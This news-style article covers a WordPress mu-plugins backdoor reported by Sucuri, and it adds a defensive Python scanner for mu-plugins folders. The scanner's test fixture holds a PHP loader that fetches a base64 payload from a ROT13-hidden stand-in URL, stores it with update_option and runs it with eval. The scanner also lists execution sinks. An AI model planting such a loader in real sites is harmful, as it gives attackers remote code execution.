New York, NY – A sophisticated and stealthy backdoor has been unearthed lurking within the WordPress mu-plugins folder, granting malicious actors persistent and virtually undetectable access to compromised websites. This discovery, detailed by Sucuri researchers, sheds light on a highly dangerous threat designed to evade detection and maintain full administrative control over infected sites.
The Anatomy of an Evasive Threat
At the heart of this backdoor lies a malicious PHP file, deceptively named “wp-index.php.” Far from being a legitimate WordPress component, this file functions as a loader. Its primary role is to fetch a highly obfuscated payload, which it then stores within the WordPress database. This design choice is crucial for its stealth, since the core malicious code resides in a location that file-based scans and casual inspection of the web root do not cover, making detection more challenging for site administrators. The choice of folder matters as well: files in wp-content/mu-plugins are loaded automatically on every request and cannot be deactivated from the Plugins screen, which makes the directory attractive for persistence.
Cloaked in Obfuscation: How the Backdoor Hides in Plain Sight
The backdoor employs layered techniques to obscure its true nature. Researchers found that it uses ROT13, a simple letter-substitution cipher, as a first layer of obfuscation: the remote address of the payload is stored as a ROT13-encoded string and decoded only at runtime. From that URL, a base64-encoded payload is fetched, decoded, and then executed. Because neither the plaintext URL nor the payload ever appears on disk, the loader leaves minimal traces, making it difficult for standard security scans to pinpoint and analyze.
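The following scanner is an added example written for this article; it is not Sucuri's tooling and contains no code from the backdoor itself. It walks a wp-content/mu-plugins folder and flags PHP files that combine the indicators described above (ROT13 and base64 decoding, a remote fetch, a database write and an execution sink), and it decodes ROT13 string literals so an analyst can read a hidden URL without executing the file. The two sample files it scans, and the URL inside them, are constructed for the demo; the file name wp-index.php comes from the article.

```python
"""Defensive triage of a WordPress mu-plugins directory.

Added example for this article, not Sucuri's tooling or code from the
backdoor. It flags PHP files that combine the loader's indicators and
decodes ROT13 string literals into readable URLs. Sample file contents
and the URL they contain are constructed.
"""
import codecs
import os
import re
import tempfile

# PHP call names grouped by role. Any single group is common in benign code;
# the combination is what the loader described in the article relies on.
OBFUSCATION = ("str_rot13", "base64_decode", "gzinflate", "gzuncompress")
REMOTE_FETCH = ("file_get_contents", "curl_exec", "wp_remote_get", "fopen")
EXEC_SINKS = ("eval", "assert", "create_function", "system", "shell_exec", "passthru")
DB_STASH = ("update_option", "add_option", "set_transient")

# Single- or double-quoted PHP string literals (non-greedy, unescaped closing quote).
STRING_LITERAL = re.compile(r"""(['"])(.*?)(?<!\\)\1""", re.S)


def find_indicators(source: str) -> dict:
    """Map each indicator group to the call names actually present in `source`."""
    groups = (("obfuscation", OBFUSCATION), ("remote_fetch", REMOTE_FETCH),
              ("exec_sink", EXEC_SINKS), ("db_stash", DB_STASH))
    hits = {}
    for label, names in groups:
        found = sorted(n for n in names
                       if re.search(r"\b" + re.escape(n) + r"\s*\(", source))
        if found:
            hits[label] = found
    return hits


def decode_rot13_literals(source: str) -> list:
    """Return every string literal that becomes an http(s) URL under ROT13."""
    urls = []
    for _quote, literal in STRING_LITERAL.findall(source):
        decoded = codecs.decode(literal, "rot_13")
        if re.match(r"https?://", decoded):
            urls.append(decoded)
    return urls


def is_suspicious(name: str, hits: dict, urls: list) -> bool:
    """Flag the article's file name, any hidden URL, or decoding paired with a fetch or sink."""
    paired = "obfuscation" in hits and ("exec_sink" in hits or "remote_fetch" in hits)
    return name == "wp-index.php" or bool(urls) or paired


def scan_mu_plugins(mu_dir: str) -> list:
    """Walk wp-content/mu-plugins and return one finding per suspicious PHP file."""
    findings = []
    for root, _dirs, files in os.walk(mu_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            hits = find_indicators(source)
            urls = decode_rot13_literals(source)
            if is_suspicious(name, hits, urls):
                findings.append({"file": name, "indicators": hits, "decoded_urls": urls})
    return findings


# Constructed fixtures: a loader shaped like the one the article describes
# (ROT13 URL -> fetch -> base64 -> store in an option -> execute) and a benign plugin.
SAMPLE_LOADER = r"""<?php
$u = str_rot13('uggcf://rknzcyr.arg/cnlybnq.gkg');
$p = base64_decode(file_get_contents($u));
update_option('_wp_cache_payload', $p);
eval($p);
"""
SAMPLE_BENIGN = r"""<?php
add_filter('xmlrpc_enabled', '__return_false');
"""


def demo() -> list:
    """Write the fixtures into a temporary mu-plugins folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        mu_dir = os.path.join(tmp, "wp-content", "mu-plugins")
        os.makedirs(mu_dir)
        with open(os.path.join(mu_dir, "wp-index.php"), "w") as fh:
            fh.write(SAMPLE_LOADER)
        with open(os.path.join(mu_dir, "harden-xmlrpc.php"), "w") as fh:
            fh.write(SAMPLE_BENIGN)
        return scan_mu_plugins(mu_dir)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a real site by calling scan_mu_plugins with the path to wp-content/mu-plugins. The scanner deliberately requires a combination of indicators before flagging a file, because base64_decode or file_get_contents alone appear in plenty of legitimate plugins; a decoded ROT13 URL, on the other hand, is flagged on its own, since there is no ordinary reason to store a remote address that way. Any finding should be followed by a review of the wp_options table for unexpected entries, as the article notes the payload is kept in the database rather than on disk.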
Full Control, Relentless Persistence: The Backdoor’s Capabilities
Once active, the backdoor grants attackers an alarming level of control over the compromised website. It comes equipped with a hidden file manager, allowing cybercriminals to browse, modify, and exfiltrate sensitive data directly from the server. Furthermore, it automatically creates a new administrative user, ensuring that even if legitimate admin accounts are secured, the attackers retain a backdoor into the system. What makes this threat particularly formidable is its dedication to persistence: the malware force-installs a malicious plugin. This plugin acts as a self-healing mechanism, designed to restore the backdoor if any attempt is made to remove it. To further solidify their access, the attackers can also change the passwords of common admin usernames to a default, attacker-set value, guaranteeing continued unauthorized entry.
A Growing Risk: Implications for Website Security
The discovery of this stealthy WordPress backdoor emphasizes the evolving and increasingly sophisticated nature of web threats. A compromised website is not merely a static target; it can be leveraged for a myriad of illicit activities, including broader attacks against other systems, phishing campaigns, or serving as a host for further malware distribution. The ability of this particular backdoor to evade detection, reinstall itself, and facilitate remote command execution makes it a significant and persistent danger that web administrators must be acutely aware of.